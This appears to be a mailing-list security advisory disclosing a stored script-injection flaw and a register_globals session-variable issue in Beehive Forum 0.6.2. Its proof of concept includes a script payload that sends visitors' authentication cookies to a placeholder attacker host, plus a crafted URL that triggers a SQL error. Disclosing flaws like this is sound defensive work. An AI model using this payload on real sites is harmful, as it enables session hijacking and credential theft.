[KAPDA::#17] - beehiveforum Script Injection
KAPDA New advisory
Vendor: http://www.beehiveforum.net
Vulnerable: Version 0.6.2
Bug: HTML Injection , Possible attacks with
register_globals = On
Exploitation: Remote with browser
Description:
--------------------
Beehive Forum is a PHP-based message board system that
uses a MySQL database.
Vulnerability:
--------------------
-HTML Injection:
The software does not properly filter HTML tags in
"Name","Description" & "Comment" fields in 'links.php'
& 'links_add.php' hat may allow a remote user to
inject HTML/javascript codes. The hostile code may be
rendered in the web browser of the victim user who
will visit these pages. (persistent)
POC:
--------------------
COMMENT:
very nice link
;)<script>document.location.replace='http://hackersite.com
/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
As a result, the code will be able to access the
target user's cookies (including authentication
cookies)
bh_sess_hash
bh_remeber_username
bh_remember_password
bh_remeber_passhash
-Possible attacks with register_globals = on
When register_globals = on , malicious user may be
able to set $user_sess variable unexpectedly.
POC:
--------------------
http://example.com/beehive/index.php?user_sess=k
error:
--------------------
Error Message for server admins and developers:
Unknown error [1054]
Unknown column 'k' in 'on clause'
SELECT FORUMS.FID, FORUMS.WEBTAG,
CONCAT(FORUMS.WEBTAG, '', '_') AS PREFIX,
FORUMS.ACCESS_LEVEL, USER_FORUM.ALLOWED FROM FORUMS
FORUMS LEFT JOIN USER_FORUM USER_FORUM ON
(USER_FORUM.FID = FORUMS.FID AND USER_FORUM.UID = k)
WHERE DEFAULT_FORUM = 1
Unknown error in line 138 of file db_mysql.inc.php
--------------------
OR
http://example.com/beehive/index.php?user_sess=1+MYFORUM
...
The insufficient protection in index.php:
$forum_settings = forum_get_settings();
include_once(BH_INCLUDE_PATH. "header.inc.php");
include_once(BH_INCLUDE_PATH. "html.inc.php");
include_once(BH_INCLUDE_PATH. "lang.inc.php");
include_once(BH_INCLUDE_PATH. "light.inc.php");
include_once(BH_INCLUDE_PATH. "logon.inc.php");
include_once(BH_INCLUDE_PATH. "messages.inc.php");
include_once(BH_INCLUDE_PATH. "session.inc.php");
$user_sess = bh_session_check(false);
Solution:
--------------------
There is no vendor supplied patch for this issue at
this time.
Original Advisories:
--------------------
http://kapda.ir/advisory-158.html
IN Farsi: http://irannetjob.com/content/view/177/28/
Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com